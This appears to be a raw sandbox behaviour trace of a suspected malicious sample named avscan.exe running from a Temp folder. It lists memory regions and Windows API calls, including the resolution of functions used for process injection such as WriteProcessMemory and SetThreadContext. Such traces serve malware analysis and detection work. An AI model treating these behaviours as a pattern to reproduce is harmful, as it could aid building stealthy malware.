"tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1246 start_va = 0x360000 end_va = 0x360fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1247 start_va = 0x370000 end_va = 0x376fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1248 start_va = 0x360000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 1249 start_va = 0x3630000 end_va = 0x382ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003630000" filename = "" Region: id = 1250 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 1310 start_va = 0x3120000 end_va = 0x315ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003120000" filename = "" Region: id = 1311 start_va = 0x31c0000 end_va = 0x31fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031c0000" filename = "" Region: id = 1312 start_va = 0x3830000 end_va = 0x3a2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003830000" filename = "" Region: id = 1313 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 1315 start_va = 0x3a30000 end_va = 0x3b1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a30000" filename = "" Region: id = 1316 start_va = 0x3a0000 end_va = 0x3affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 1317 start_va = 0x72ec0000 end_va = 0x72f1efff monitored = 0 entry_point = 0x72ec2134 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 1381 start_va = 0x74490000 end_va = 0x744a2fff monitored = 0 entry_point = 0x74491d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1395 start_va = 0x3b0000 end_va = 0x3b4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 1396 start_va = 0x3510000 end_va = 0x358ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003510000" filename = "" Region: id = 1397 start_va = 0x35a0000 end_va = 0x3627fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035a0000" filename = "" Region: id = 1414 start_va = 0x3d0000 end_va = 0x3d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 1415 start_va = 0x77450000 end_va = 0x774d2fff monitored = 0 entry_point = 0x774523d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1416 start_va = 0x3e0000 end_va = 0x3e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 1417 start_va = 0x75390000 end_va = 0x753b9fff monitored = 0 entry_point = 0x753913f2 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\SysWOW64\\scrrun.dll" (normalized: "c:\\windows\\syswow64\\scrrun.dll") Region: id = 1418 start_va = 0xf30000 end_va = 0xf44fff monitored = 0 entry_point = 0xf313f2 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\SysWOW64\\scrrun.dll" (normalized: "c:\\windows\\syswow64\\scrrun.dll") Region: id = 1419 start_va = 0x3b20000 end_va = 0x63a4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b20000" filename = "" Region: id = 1435 start_va = 0x63b0000 end_va = 0x8c34fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000063b0000" filename = "" Region: id = 1555 start_va = 0x3b20000 end_va = 0x63a4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b20000" filename = "" Region: id = 1564 start_va = 0x63b0000 end_va = 0x8c34fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000063b0000" filename = "" Region: id = 1708 start_va = 0xf30000 end_va = 0xf44fff monitored = 0 entry_point = 0xf313f2 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\SysWOW64\\scrrun.dll" (normalized: "c:\\windows\\syswow64\\scrrun.dll") Region: id = 1709 start_va = 0x72c50000 end_va = 0x72c70fff monitored = 0 entry_point = 0x72c5e356 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx") Region: id = 1737 start_va = 0x72c20000 end_va = 0x72c31fff monitored = 0 entry_point = 0x72c21200 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 1876 start_va = 0x3f0000 end_va = 0x3fbfff monitored = 0 entry_point = 0x3fe356 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx") Region: id = 1909 start_va = 0xf30000 end_va = 0xf44fff monitored = 0 entry_point = 0xf313f2 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\SysWOW64\\scrrun.dll" (normalized: "c:\\windows\\syswow64\\scrrun.dll") Region: id = 1979 start_va = 0xf30000 end_va = 0xf44fff monitored = 0 entry_point = 0xf313f2 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\SysWOW64\\scrrun.dll" (normalized: "c:\\windows\\syswow64\\scrrun.dll") Region: id = 2081 start_va = 0x3b20000 end_va = 0x63a4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b20000" filename = "" Region: id = 2088 start_va = 0x63b0000 end_va = 0x8c34fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000063b0000" filename = "" Region: id = 2089 start_va = 0x63b0000 end_va = 0x8c34fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000063b0000" filename = "" Thread: id = 55 os_tid = 0xfd8 [0106.758] GetVersion () returned 0x1db10106 [0106.758] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0106.758] GetProcAddress (hModule=0x75a80000, lpProcName="IsTNT") returned 0x0 [0106.758] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0xf00000 [0106.759] VirtualAlloc (lpAddress=0x0, dwSize=0x400000, flAllocationType=0x2000, flProtect=0x4) returned 0x2a50000 [0106.759] VirtualAlloc (lpAddress=0x2a50000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x2a50000 [0106.762] GetCurrentThreadId () returned 0xfd8 [0106.763] GetCommandLineA () returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" [0106.763] GetEnvironmentStringsW () returned 0x11458a0* [0106.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1473, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1473 [0106.763] RtlAllocateHeap (HeapHandle=0xf00000, Flags=0x0, Size=0x5d0) returned 0xf007d0 [0106.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1473, lpMultiByteStr=0xf007d0, cbMultiByte=1473, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1473 [0106.763] FreeEnvironmentStringsW (penv=0x11458a0) returned 1 [0106.763] RtlAllocateHeap (HeapHandle=0xf00000, Flags=0x0, Size=0x480) returned 0xf00da8 [0106.763] GetStartupInfoA (in: lpStartupInfo=0x28f9b8 | out: lpStartupInfo=0x28f9b8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0106.763] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0106.763] GetFileType (hFile=0x0) returned 0x0 [0106.763] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0106.763] GetFileType (hFile=0x0) returned 0x0 [0106.764] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0106.764] GetFileType (hFile=0x0) returned 0x0 [0106.764] SetHandleCount (uNumber=0x20) returned 0x20 [0106.764] GetACP () returned 0x4e4 [0106.764] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x28f9e0 | out: lpCPInfo=0x28f9e0) returned 1 [0106.764] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72a4c528, nSize=0x104 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe")) returned 0x2f [0106.773] HeapFree (in: hHeap=0xf00000, dwFlags=0x0, lpMem=0xf007d0 | out: hHeap=0xf00000) returned 1 [0106.773] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x75a80000 [0106.773] GetProcAddress (hModule=0x75a80000, lpProcName="IsProcessorFeaturePresent") returned 0x75a951ed [0106.773] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0106.774] RtlAllocateHeap (HeapHandle=0xf00000, Flags=0x8, Size=0x800) returned 0xf01230 [0106.775] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x98 [0106.775] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x9c [0106.776] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0106.776] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x72a4e6c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\syswow64\\msvbvm60.dll")) returned 0x20 [0106.776] GetVersion () returned 0x1db10106 [0106.776] lstrcmpiW (lpString1="A", lpString2="B") returned -1 [0106.780] GetUserDefaultLCID () returned 0x409 [0106.780] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="A", cchCount1=-1, lpString2="B", cchCount2=-1) returned 1 [0106.780] GetSystemMetrics (nIndex=5) returned 1 [0106.780] GetSystemMetrics (nIndex=6) returned 1 [0106.781] GetSystemMetrics (nIndex=11) returned 32 [0106.781] GetSystemMetrics (nIndex=12) returned 32 [0106.781] GetSystemMetrics (nIndex=34) returned 132 [0106.781] GetSystemMetrics (nIndex=35) returned 38 [0106.781] GetSystemMetrics (nIndex=0) returned 1440 [0106.781] GetSystemMetrics (nIndex=1) returned 900 [0106.781] GetSystemMetrics (nIndex=32) returned 8 [0106.781] GetSystemMetrics (nIndex=33) returned 8 [0106.781] GetSystemMetrics (nIndex=42) returned 0 [0106.781] GetStockObject (i=15) returned 0x188000b [0106.781] GetStockObject (i=7) returned 0x1b00017 [0106.781] GetStockObject (i=6) returned 0x1b00018 [0106.781] GetStockObject (i=8) returned 0x1b00016 [0106.781] GetStockObject (i=4) returned 0x1900011 [0106.781] GetStockObject (i=2) returned 0x1900012 [0106.781] GetStockObject (i=0) returned 0x1900010 [0106.782] GetStockObject (i=5) returned 0x1900015 [0106.782] GetStockObject (i=13) returned 0x18a002e [0106.782] GetDC (hWnd=0x0) returned 0x701020b [0106.784] GetTextExtentPointA (in: hdc=0x701020b, lpString="0", c=1, lpsz=0x28f9dc | out: lpsz=0x28f9dc) returned 1 [0106.788] GetDeviceCaps (hdc=0x701020b, index=14) returned 1 [0106.788] GetDeviceCaps (hdc=0x701020b, index=12) returned 32 [0106.788] GetDeviceCaps (hdc=0x701020b, index=88) returned 96 [0106.789] GetDeviceCaps (hdc=0x701020b, index=90) returned 96 [0106.789] GetDeviceCaps (hdc=0x701020b, index=38) returned 32409 [0106.789] ReleaseDC (hWnd=0x0, hDC=0x701020b) returned 1 [0106.789] HeapCreate (flOptions=0x0, dwInitialSize=0x0, dwMaximumSize=0x0) returned 0x10d0000 [0106.789] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0x72a4e7d0 | out: ppMalloc=0x72a4e7d0*=0x76da66bc) returned 0x0 [0106.790] GetCurrentThreadId () returned 0xfd8 [0107.890] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0107.892] GetProcAddress (hModule=0x75a80000, lpProcName="DeleteCriticalSection") returned 0x77a945f5 [0107.892] GetProcAddress (hModule=0x75a80000, lpProcName="LeaveCriticalSection") returned 0x77a82270 [0107.892] GetProcAddress (hModule=0x75a80000, lpProcName="EnterCriticalSection") returned 0x77a822b0 [0107.892] GetProcAddress (hModule=0x75a80000, lpProcName="InitializeCriticalSection") returned 0x77a92c42 [0107.892] GetProcAddress (hModule=0x75a80000, lpProcName="VirtualFree") returned 0x75a9184e [0107.892] GetProcAddress (hModule=0x75a80000, lpProcName="VirtualAlloc") returned 0x75a91836 [0107.893] GetProcAddress (hModule=0x75a80000, lpProcName="LocalFree") returned 0x75a92cec [0107.893] GetProcAddress (hModule=0x75a80000, lpProcName="LocalAlloc") returned 0x75a9166c [0107.893] GetProcAddress (hModule=0x75a80000, lpProcName="GetTickCount") returned 0x75a9110c [0107.893] GetProcAddress (hModule=0x75a80000, lpProcName="QueryPerformanceCounter") returned 0x75a91705 [0107.893] GetProcAddress (hModule=0x75a80000, lpProcName="GetVersion") returned 0x75a9441f [0107.893] GetProcAddress (hModule=0x75a80000, lpProcName="GetCurrentThreadId") returned 0x75a91430 [0107.893] GetProcAddress (hModule=0x75a80000, lpProcName="InterlockedDecrement") returned 0x75a913d0 [0107.893] GetProcAddress (hModule=0x75a80000, lpProcName="InterlockedIncrement") returned 0x75a913e0 [0107.893] GetProcAddress (hModule=0x75a80000, lpProcName="VirtualQuery") returned 0x75a94412 [0107.893] GetProcAddress (hModule=0x75a80000, lpProcName="WideCharToMultiByte") returned 0x75a916ed [0107.894] GetProcAddress (hModule=0x75a80000, lpProcName="MultiByteToWideChar") returned 0x75a9190e [0107.894] GetProcAddress (hModule=0x75a80000, lpProcName="lstrlenA") returned 0x75a95a03 [0107.894] GetProcAddress (hModule=0x75a80000, lpProcName="lstrcpynA") returned 0x75aa18e2 [0107.894] GetProcAddress (hModule=0x75a80000, lpProcName="LoadLibraryExA") returned 0x75a948cb [0107.894] GetProcAddress (hModule=0x75a80000, lpProcName="GetThreadLocale") returned 0x75a9357f [0107.894] GetProcAddress (hModule=0x75a80000, lpProcName="GetStartupInfoA") returned 0x75a90e00 [0107.894] GetProcAddress (hModule=0x75a80000, lpProcName="GetProcAddress") returned 0x75a91222 [0107.894] GetProcAddress (hModule=0x75a80000, lpProcName="GetModuleHandleA") returned 0x75a91245 [0107.894] GetProcAddress (hModule=0x75a80000, lpProcName="GetModuleFileNameA") returned 0x75a91491 [0107.894] GetProcAddress (hModule=0x75a80000, lpProcName="GetLocaleInfoA") returned 0x75aad5b5 [0107.895] GetProcAddress (hModule=0x75a80000, lpProcName="GetCommandLineA") returned 0x75a95159 [0107.895] GetProcAddress (hModule=0x75a80000, lpProcName="FreeLibrary") returned 0x75a93478 [0107.895] GetProcAddress (hModule=0x75a80000, lpProcName="FindFirstFileA") returned 0x75a9e286 [0107.895] GetProcAddress (hModule=0x75a80000, lpProcName="FindClose") returned 0x75a943fa [0107.895] GetProcAddress (hModule=0x75a80000, lpProcName="ExitProcess") returned 0x75a979c8 [0107.895] GetProcAddress (hModule=0x75a80000, lpProcName="ExitThread") returned 0x77abd598 [0107.895] GetProcAddress (hModule=0x75a80000, lpProcName="CreateThread") returned 0x75a93485 [0107.895] GetProcAddress (hModule=0x75a80000, lpProcName="WriteFile") returned 0x75a91282 [0107.895] GetProcAddress (hModule=0x75a80000, lpProcName="UnhandledExceptionFilter") returned 0x75ab76f7 [0107.895] GetProcAddress (hModule=0x75a80000, lpProcName="RtlUnwind") returned 0x75abd1b3 [0107.896] GetProcAddress (hModule=0x75a80000, lpProcName="RaiseException") returned 0x75a9585e [0107.896] GetProcAddress (hModule=0x75a80000, lpProcName="GetStdHandle") returned 0x75a9516b [0107.896] GetProcAddress (hModule=0x75a80000, lpProcName="TlsSetValue") returned 0x75a914db [0107.896] GetProcAddress (hModule=0x75a80000, lpProcName="TlsGetValue") returned 0x75a911e0 [0107.896] GetProcAddress (hModule=0x75a80000, lpProcName="TlsFree") returned 0x75a93537 [0107.896] GetProcAddress (hModule=0x75a80000, lpProcName="TlsAlloc") returned 0x75a94965 [0107.896] GetProcAddress (hModule=0x75a80000, lpProcName="lstrcpyA") returned 0x75ab2a6d [0107.896] GetProcAddress (hModule=0x75a80000, lpProcName="lstrcmpA") returned 0x75aaecbb [0107.896] GetProcAddress (hModule=0x75a80000, lpProcName="WriteProcessMemory") returned 0x75aad9b0 [0107.896] GetProcAddress (hModule=0x75a80000, lpProcName="WritePrivateProfileStringW") returned 0x75ab63dc [0107.897] GetProcAddress (hModule=0x75a80000, lpProcName="WritePrivateProfileStringA") returned 0x75ab7018 [0107.897] GetProcAddress (hModule=0x75a80000, lpProcName="WaitForSingleObject") returned 0x75a91136 [0107.897] GetProcAddress (hModule=0x75a80000, lpProcName="VirtualUnlock") returned 0x75aaef11 [0107.897] GetProcAddress (hModule=0x75a80000, lpProcName="VirtualProtectEx") returned 0x75b14b5f [0107.897] GetProcAddress (hModule=0x75a80000, lpProcName="VirtualProtect") returned 0x75a94317 [0107.897] GetProcAddress (hModule=0x75a80000, lpProcName="VirtualLock") returned 0x75aaec0b [0107.897] GetProcAddress (hModule=0x75a80000, lpProcName="VirtualAllocEx") returned 0x75aad980 [0107.897] GetProcAddress (hModule=0x75a80000, lpProcName="UnmapViewOfFile") returned 0x75a91806 [0107.898] GetProcAddress (hModule=0x75a80000, lpProcName="TerminateThread") returned 0x75a979e7 [0107.898] GetProcAddress (hModule=0x75a80000, lpProcName="SystemTimeToFileTime") returned 0x75a95a36 [0107.898] GetProcAddress (hModule=0x75a80000, lpProcName="SuspendThread") returned 0x75ab7d46 [0107.898] GetProcAddress (hModule=0x75a80000, lpProcName="Sleep") returned 0x75a910ff [0107.898] GetProcAddress (hModule=0x75a80000, lpProcName="SizeofResource") returned 0x75a95a81 [0107.898] GetProcAddress (hModule=0x75a80000, lpProcName="SetThreadPriority") returned 0x75a9326b [0107.898] GetProcAddress (hModule=0x75a80000, lpProcName="SetThreadLocale") returned 0x75a98991 [0107.898] GetProcAddress (hModule=0x75a80000, lpProcName="SetThreadContext") returned 0x75b15933 [0107.899] GetProcAddress (hModule=0x75a80000, lpProcName="SetLastError") returned 0x75a911a9 [0107.899] GetProcAddress (hModule=0x75a80000, lpProcName="SetFilePointer") returned 0x75a917b1 [0107.899] GetProcAddress (hModule=0x75a80000, lpProcName="SetFileAttributesW") returned 0x75aad4c7 [0107.899] GetProcAddress (hModule=0x75a80000, lpProcName="SetFileAttributesA") returned 0x75aaeca3 [0107.899] GetProcAddress (hModule=0x75a80000, lpProcName="SetEvent") returned 0x75a916a5 [0107.899] GetProcAddress (hModule=0x75a80000, lpProcName="SetErrorMode") returned 0x75a91ae0 [0107.899] GetProcAddress (hModule=0x75a80000, lpProcName="SetEnvironmentVariableW") returned 0x75a989a9 [0107.899] GetProcAddress (hModule=0x75a80000, lpProcName="SetEnvironmentVariableA") returned 0x75a9e2e9 [0107.899] GetProcAddress (hModule=0x75a80000, lpProcName="SetEndOfFile") returned 0x75aace06 [0107.899] GetProcAddress (hModule=0x75a80000, lpProcName="SetCurrentDirectoryW") returned 0x75aa1218 [0107.899] GetProcAddress (hModule=0x75a80000, lpProcName="SetCurrentDirectoryA") returned 0x75aa17ec [0107.900] GetProcAddress (hModule=0x75a80000, lpProcName="ResumeThread") returned 0x75a943a7 [0107.900] GetProcAddress (hModule=0x75a80000, lpProcName="ResetEvent") returned 0x75a916bd [0107.900] GetProcAddress (hModule=0x75a80000, lpProcName="RemoveDirectoryW") returned 0x75b14a6f [0107.900] GetProcAddress (hModule=0x75a80000, lpProcName="RemoveDirectoryA") returned 0x75b14a5f [0107.900] GetProcAddress (hModule=0x75a80000, lpProcName="ReadProcessMemory") returned 0x75aacfa4 [0107.900] GetProcAddress (hModule=0x75a80000, lpProcName="ReadFile") returned 0x75a93e83 [0107.900] GetProcAddress (hModule=0x75a80000, lpProcName="QueryDosDeviceW") returned 0x75abcedc [0107.900] GetProcAddress (hModule=0x75a80000, lpProcName="PostQueuedCompletionStatus") returned 0x75aaeef9 [0107.900] GetProcAddress (hModule=0x75a80000, lpProcName="OpenProcess") returned 0x75a91966 [0107.900] GetProcAddress (hModule=0x75a80000, lpProcName="MulDiv") returned 0x75a91b30 [0107.901] GetProcAddress (hModule=0x75a80000, lpProcName="MapViewOfFileEx") returned 0x75a94c3b [0107.901] GetProcAddress (hModule=0x75a80000, lpProcName="MapViewOfFile") returned 0x75a918d1 [0107.901] GetProcAddress (hModule=0x75a80000, lpProcName="LockResource") returned 0x75a95911 [0107.901] GetProcAddress (hModule=0x75a80000, lpProcName="LoadResource") returned 0x75a95904 [0107.901] GetProcAddress (hModule=0x75a80000, lpProcName="LoadLibraryExW") returned 0x75a94915 [0107.901] GetProcAddress (hModule=0x75a80000, lpProcName="LoadLibraryW") returned 0x75a948e3 [0107.901] GetProcAddress (hModule=0x75a80000, lpProcName="LoadLibraryA") returned 0x75a9498f [0107.901] GetProcAddress (hModule=0x75a80000, lpProcName="IsBadWritePtr") returned 0x75abd1dc [0107.901] GetProcAddress (hModule=0x75a80000, lpProcName="IsBadStringPtrW") returned 0x75ab3058 [0107.901] GetProcAddress (hModule=0x75a80000, lpProcName="IsBadReadPtr") returned 0x75abd065 [0107.901] GetProcAddress (hModule=0x75a80000, lpProcName="HeapDestroy") returned 0x75a93567 [0107.901] GetProcAddress (hModule=0x75a80000, lpProcName="HeapCreate") returned 0x75a949e5 [0107.902] GetProcAddress (hModule=0x75a80000, lpProcName="HeapAlloc") returned 0x77a8e026 [0107.902] GetProcAddress (hModule=0x75a80000, lpProcName="GlobalUnlock") returned 0x75aacfb4 [0107.902] GetProcAddress (hModule=0x75a80000, lpProcName="GlobalReAlloc") returned 0x75aae48e [0107.902] GetProcAddress (hModule=0x75a80000, lpProcName="GlobalHandle") returned 0x75abd26c [0107.902] GetProcAddress (hModule=0x75a80000, lpProcName="GlobalLock") returned 0x75aad077 [0107.902] GetProcAddress (hModule=0x75a80000, lpProcName="GlobalFree") returned 0x75a95510 [0107.902] GetProcAddress (hModule=0x75a80000, lpProcName="GlobalFindAtomA") returned 0x75abd348 [0107.902] GetProcAddress (hModule=0x75a80000, lpProcName="GlobalDeleteAtom") returned 0x75aacd85 [0107.902] GetProcAddress (hModule=0x75a80000, lpProcName="GlobalAlloc") returned 0x75a95846 [0107.902] GetProcAddress (hModule=0x75a80000, lpProcName="GlobalAddAtomA") returned 0x75ab04f6 [0107.902] GetProcAddress (hModule=0x75a80000, lpProcName="GetWindowsDirectoryW") returned 0x75a9439a [0107.902] GetProcAddress (hModule=0x75a80000, lpProcName="GetWindowsDirectoryA") returned 0x75ab2ada [0107.902] GetProcAddress (hModule=0x75a80000, lpProcName="GetVolumeInformationW") returned 0x75aac838 [0107.903] GetProcAddress (hModule=0x75a80000, lpProcName="GetVolumeInformationA") returned 0x75ab6d9b [0107.903] GetProcAddress (hModule=0x75a80000, lpProcName="GetVersionExA") returned 0x75a934c9 [0107.903] GetProcAddress (hModule=0x75a80000, lpProcName="GetTimeZoneInformation") returned 0x75a94612 [0107.903] GetProcAddress (hModule=0x75a80000, lpProcName="GetThreadPriority") returned 0x75a94377 [0107.903] GetProcAddress (hModule=0x75a80000, lpProcName="GetThreadContext") returned 0x75ab799c [0107.903] GetProcAddress (hModule=0x75a80000, lpProcName="GetTempPathW") returned 0x75aad4ac [0107.903] GetProcAddress (hModule=0x75a80000, lpProcName="GetTempPathA") returned 0x75ab273c [0107.903] GetProcAddress (hModule=0x75a80000, lpProcName="GetTempFileNameW") returned 0x75abd1a6 [0107.903] GetProcAddress (hModule=0x75a80000, lpProcName="GetTempFileNameA") returned 0x75ab9d0f [0107.903] GetProcAddress (hModule=0x75a80000, lpProcName="GetSystemInfo") returned 0x75a94982 [0107.903] GetProcAddress (hModule=0x75a80000, lpProcName="GetSystemDirectoryW") returned 0x75a9501b [0107.904] GetProcAddress (hModule=0x75a80000, lpProcName="GetSystemDirectoryA") returned 0x75aab644 [0107.904] GetProcAddress (hModule=0x75a80000, lpProcName="GetStringTypeExW") returned 0x75a9553e [0107.904] GetProcAddress (hModule=0x75a80000, lpProcName="GetStringTypeExA") returned 0x75ab822e [0107.904] GetProcAddress (hModule=0x75a80000, lpProcName="GetPrivateProfileStringW") returned 0x75a9ea00 [0107.904] GetProcAddress (hModule=0x75a80000, lpProcName="GetPrivateProfileStringA") returned 0x75aa1804 [0107.904] GetProcAddress (hModule=0x75a80000, lpProcName="GetModuleHandleW") returned 0x75a93460 [0107.904] GetProcAddress (hModule=0x75a80000, lpProcName="GetModuleFileNameW") returned 0x75a94908 [0107.904] GetProcAddress (hModule=0x75a80000, lpProcName="GetLogicalDriveStringsW") returned 0x75b1490f [0107.904] GetProcAddress (hModule=0x75a80000, lpProcName="GetLocaleInfoW") returned 0x75a93bf2 [0107.904] GetProcAddress (hModule=0x75a80000, lpProcName="GetLocalTime") returned 0x75a95a5e [0107.905] GetProcAddress (hModule=0x75a80000, lpProcName="GetLastError") returned 0x75a911c0 [0107.905] GetProcAddress (hModule=0x75a80000, lpProcName="GetFullPathNameW") returned 0x75a9408c [0107.905] GetProcAddress (hModule=0x75a80000, lpProcName="GetFullPathNameA") returned 0x75a9e279 [0107.905] GetProcAddress (hModule=0x75a80000, lpProcName="GetFileSize") returned 0x75a9194e [0107.905] GetProcAddress (hModule=0x75a80000, lpProcName="GetFileAttributesExW") returned 0x75a9452c [0107.905] GetProcAddress (hModule=0x75a80000, lpProcName="GetFileAttributesExA") returned 0x75abcc04 [0107.905] GetProcAddress (hModule=0x75a80000, lpProcName="GetFileAttributesW") returned 0x75a91af8 [0107.953] GetProcAddress (hModule=0x75a80000, lpProcName="GetFileAttributesA") returned 0x75a953cc [0107.953] GetProcAddress (hModule=0x75a80000, lpProcName="GetExitCodeThread") returned 0x75aad585 [0107.953] GetProcAddress (hModule=0x75a80000, lpProcName="GetDriveTypeA") returned 0x75aaef45 [0107.953] GetProcAddress (hModule=0x75a80000, lpProcName="GetDiskFreeSpaceA") returned 0x75b148df [0107.954] GetProcAddress (hModule=0x75a80000, lpProcName="GetDateFormatA") returned 0x75aba939 [0107.954] GetProcAddress (hModule=0x75a80000, lpProcName="GetCurrentThread") returned 0x75a917cc [0107.954] GetProcAddress (hModule=0x75a80000, lpProcName="GetCurrentProcessId") returned 0x75a911f8 [0107.954] GetProcAddress (hModule=0x75a80000, lpProcName="GetCurrentProcess") returned 0x75a917e9 [0107.954] GetProcAddress (hModule=0x75a80000, lpProcName="GetCurrentDirectoryW") returned 0x75a955c9 [0107.954] GetProcAddress (hModule=0x75a80000, lpProcName="GetCurrentDirectoryA") returned 0x75abd4e6 [0107.954] GetProcAddress (hModule=0x75a80000, lpProcName="GetComputerNameW") returned 0x75a9dcc6 [0107.954] GetProcAddress (hModule=0x75a80000, lpProcName="GetComputerNameA") returned 0x75aab6b8 [0107.954] GetProcAddress (hModule=0x75a80000, lpProcName="GetCommandLineW") returned 0x75a951db [0107.954] GetProcAddress (hModule=0x75a80000, lpProcName="GetCPInfo") returned 0x75a95141 [0107.955] GetProcAddress (hModule=0x75a80000, lpProcName="GetACP") returned 0x75a9177c [0107.955] GetProcAddress (hModule=0x75a80000, lpProcName="FreeResource") returned 0x75aad3ab [0107.955] GetProcAddress (hModule=0x75a80000, lpProcName="InterlockedExchange") returned 0x75a91442 [0107.955] GetProcAddress (hModule=0x75a80000, lpProcName="FormatMessageW") returned 0x75a945d8 [0107.955] GetProcAddress (hModule=0x75a80000, lpProcName="FormatMessageA") returned 0x75ab5f8d [0107.955] GetProcAddress (hModule=0x75a80000, lpProcName="FlushInstructionCache") returned 0x75a9434b [0107.955] GetProcAddress (hModule=0x75a80000, lpProcName="FlushFileBuffers") returned 0x75a94653 [0107.955] GetProcAddress (hModule=0x75a80000, lpProcName="FindResourceW") returned 0x75a95929 [0107.955] GetProcAddress (hModule=0x75a80000, lpProcName="FindResourceA") returned 0x75aae98b [0107.956] GetProcAddress (hModule=0x75a80000, lpProcName="FindNextFileW") returned 0x75a954a6 [0107.956] GetProcAddress (hModule=0x75a80000, lpProcName="FindNextFileA") returned 0x75abd52e [0107.956] 